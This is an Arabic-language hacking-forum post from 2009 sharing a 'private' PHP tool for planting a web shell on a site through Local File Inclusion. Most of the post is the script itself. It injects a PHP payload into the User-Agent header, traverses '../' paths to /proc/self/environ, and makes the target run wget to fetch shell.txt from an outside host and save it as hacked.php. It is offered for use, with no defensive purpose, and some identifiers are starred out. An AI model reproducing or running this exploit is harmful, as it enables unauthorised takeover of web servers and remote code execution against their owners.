عرض مشاركة واحدة
قديم 08-03-2009, 06:19 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
D4rK
 
الصورة الرمزية D4rK
 

 

 
إحصائية العضو





D4rK غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D4rK is on a distinguished road

افتراضي Uploading Shell Through Local File Inclusion ( LFI ) priv8


مرحبا

شباب اداة برايفت واحد اجنبي صاحبي مبرمجها

الشب قرر ينزلها

بس مش حتلاقوها ولا محل غير هون

و الشب اسمو بلاك دريم وهو اجنبي يعني مش علااء المصري يلي منعرفو :a07:

كود PHP:
 <?php

//Get Shell Via LFI(Local File Inclusion)
//Copyright BlackDream 2009 
//mr.pr0n you are the best boy


//edit this if you want. Linux Command
$cmd "<?php system(\"wget http://testsite.li/components/shell.txt; mv shell.txt hacked.php\");?>";
$site "http://www.thesite.com/index.php?page="//enter it like http://www.thesite.com/index.php?page=
$proc_path "proc/self/environ"//without first slash


//Do not edit below this line

preg_match"@^(http://.*?)(/|$)@"$site$matches );

$path "";
$i 0;

while ( 
)
{
    if ( 
$i >= 20 )
        break;

    
$path .= "../";
    
$source page_get_*******( $site $path $proc_path );
    if ( 
strstr($source'********_ROOT') != false )
    {
        exit( 
"\nShell Uploaded With Success -> " $matches[1] . '/' "hacked.php" );
    } else
        echo 
"\nFail at state " $i "\n";
    
$i++;
}

function 
page_get_*******( $url )
{
    global 
$cmd;
    
$ch curl_init$url );
    
curl_setopt$chCURLOPT_RETURNTRANSFERtrue );
    
curl_setopt$chCURLOPT_HEADER);
    
curl_setopt$chCURLOPT_USERAGENT$cmd );
    
curl_setopt$chCURLOPT_CONNECTTIMEOUT);
    
curl_setopt$chCURLOPT_TIMEOUT);
    
$ret curl_exec$ch );
    
curl_close$ch );
    return 
$ret;
}

?>



Uploading Shell Through Local File Inclusion ( LFI ) priv8

الملفات المرفقة
نوع الملف: txt RFI.txt‏ (1.3 كيلوبايت, المشاهدات 56)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات

التعديل الأخير تم بواسطة D4rK ; 08-03-2009 الساعة 06:46 AM.

   

رد مع اقتباس